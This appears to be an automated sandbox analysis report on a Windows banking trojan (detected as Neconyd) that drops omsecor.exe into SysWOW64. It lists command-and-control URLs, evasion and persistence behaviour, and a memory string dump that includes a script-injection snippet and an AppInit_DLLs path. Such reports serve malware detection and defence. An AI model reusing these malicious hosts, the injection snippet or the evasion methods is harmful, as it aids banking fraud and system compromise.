Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html-559bf06f72796be679
Source: omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html~
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlasuek.com
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmldZI-&
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlom
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html&
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html0
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.htmlwLt
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html)
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html4
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/785/70.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/8.htmlshqos.dll.mui
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/978/939.html
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.html.E
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.htmlam
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/434/722.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.html;Q
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.htmlwm
Source: omsecor.exe, 00000001.00000002.1883206861.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html#L
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html$
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html5L
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html;L
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlD
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlULV
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.html6Z
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.htmlZZ
Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlPZ
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlnZ
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlrZC-
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2259943860.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html/
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html3
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html7
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlA
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlN
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlasuek.com
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/en-GB
Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.dr	String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/p

E-Banking Fraud

Yara detected Neconyd

Source: Yara match	File source: Process Memory Space: bd0wJGTae5.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 6792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 764, type: MEMORYSTR

Creates files inside the system directory

Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	File created: C:\Windows\SysWOW64\merocz.xc6			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00401C41	0_2_00401C41
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040D2A4	0_2_0040D2A4
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040B51C	0_2_0040B51C
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CBD0	0_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00401C41	2_2_00401C41
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040D2A4	2_2_0040D2A4
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040B51C	2_2_0040B51C
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CBD0	2_2_0040CBD0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: String function: 00405511 appears 56 times
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00405511 appears 56 times

PE / OLE file has an invalid certificate

Source: bd0wJGTae5.exe

Static PE information: invalid certificate

Source: bd0wJGTae5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@7/3@3/3

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,

0_2_0040A057

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

File created: C:\Users\user\AppData\Roaming\omsecor.exe

Source: bd0wJGTae5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: bd0wJGTae5.exe

ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

File read: C:\Users\user\Desktop\bd0wJGTae5.exe

Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Source: unknown	Process created: C:\Users\user\Desktop\bd0wJGTae5.exe "C:\Users\user\Desktop\bd0wJGTae5.exe"
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove	Jump to behavior

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\omsecor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040D293 push ecx; ret	0_2_0040D2A3
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CBB5 push ecx; ret	0_2_0040CBC8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040D293 push ecx; ret	2_2_0040D2A3
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CBB5 push ecx; ret	2_2_0040CBC8

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\omsecor.exe

Executable created and started: C:\Windows\SysWOW64\omsecor.exe

Drops PE files to the windows directory (C:\Windows)

Drops PE files

Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to dropped file
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	File created: C:\Users\user\AppData\Roaming\omsecor.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\omsecor.exe

File created: C:\Windows\SysWOW64\omsecor.exe

Jump to dropped file

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_0040350F
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_004039EA
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	2_2_0040350F
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	2_2_004039EA

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

API coverage: 8.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6776	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 404	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088	Thread sleep time: -180000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\omsecor.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,	2_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	2_2_00408248

Source: C:\Windows\SysWOW64\omsecor.exe

Thread delayed: delay time: 60000

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: omsecor.exe, 00000001.00000002.1883482540.0000000000682000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWgRJJ

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\omsecor.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CD66

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle,

0_2_004075D4

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	0_2_004032B8
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CD66
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	2_2_004032B8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CD66

Source: bd0wJGTae5.exe, omsecor.exe	Binary or memory string: Shell_TrayWnd
Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.dr	Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_timeCsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: /*

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040CB03 cpuid

0_2_0040CB03

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,

0_2_00407267

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00407499

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00406CB5 GetVersionExW,

0_2_00406CB5

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.166.255.171	lousta.net	Finland	1741	FUNETASFI	true
52.34.198.229	ow5dirasuek.com	United States	16509	AMAZON-02US	true
